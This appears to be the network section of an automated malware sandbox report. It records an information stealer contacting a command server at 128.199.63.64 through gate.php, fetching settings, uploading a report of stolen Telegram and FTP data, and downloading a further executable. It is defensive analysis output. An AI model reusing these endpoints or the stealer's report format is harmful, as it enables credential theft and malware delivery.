Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | | |
UDP Requests
- 192.168.56.101:62324 164.124.101.2:53
- 192.168.56.101:137 192.168.56.255:137
- 192.168.56.101:138 192.168.56.255:138
- 192.168.56.101:49152 239.255.255.250:3702
- 192.168.56.101:62325 239.255.255.250:3702
- 192.168.56.101:62445 239.255.255.250:1900
- 192.168.56.101:62447 239.255.255.250:3702
- 52.231.114.183:123 192.168.56.101:123
GET 200 http://128.199.63.64/deepanal/system/assets/bundle.bin

Request:
GET /deepanal/system/assets/bundle.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Host: 128.199.63.64

Response:
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 13 Jun 2021 13:48:00 GMT
ETag: "4f1c00-5c4a5fd304400"
Accept-Ranges: bytes
Content-Length: 5184512
Content-Type: application/octet-stream
GET 200 http://128.199.63.64/deepanal/gate.php?type=settings

Request:
GET /deepanal/gate.php?type=settings HTTP/1.1
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64

Response:
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 656
Content-Type: text/html; charset=UTF-8
GET 200 http://128.199.63.64/deepanal/gate.php?type=ip

Request:
GET /deepanal/gate.php?type=ip HTTP/1.1
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64

Response:
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 15
Content-Type: text/html; charset=UTF-8
GET 200 http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1

Request:
GET /deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64
Content-Length: 35022

Response:
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:11 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET 200 http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3

Request:
GET /deepanal/gate.php?type=loader&tag=traffic3 HTTP/1.1
User-Agent: XyqYNP3LKVAxuRLmSk7Z
Host: 128.199.63.64

Response:
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 136
Content-Type: text/html; charset=UTF-8
GET 200 http://128.199.63.64/hoetnaca/exps/1.exe

Request:
GET /hoetnaca/exps/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Host: 128.199.63.64

Response:
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2021 00:51:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 17 Oct 2021 16:35:13 GMT
ETag: "422a00-5ce8f03360ba9"
Accept-Ranges: bytes
Content-Length: 4336128
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts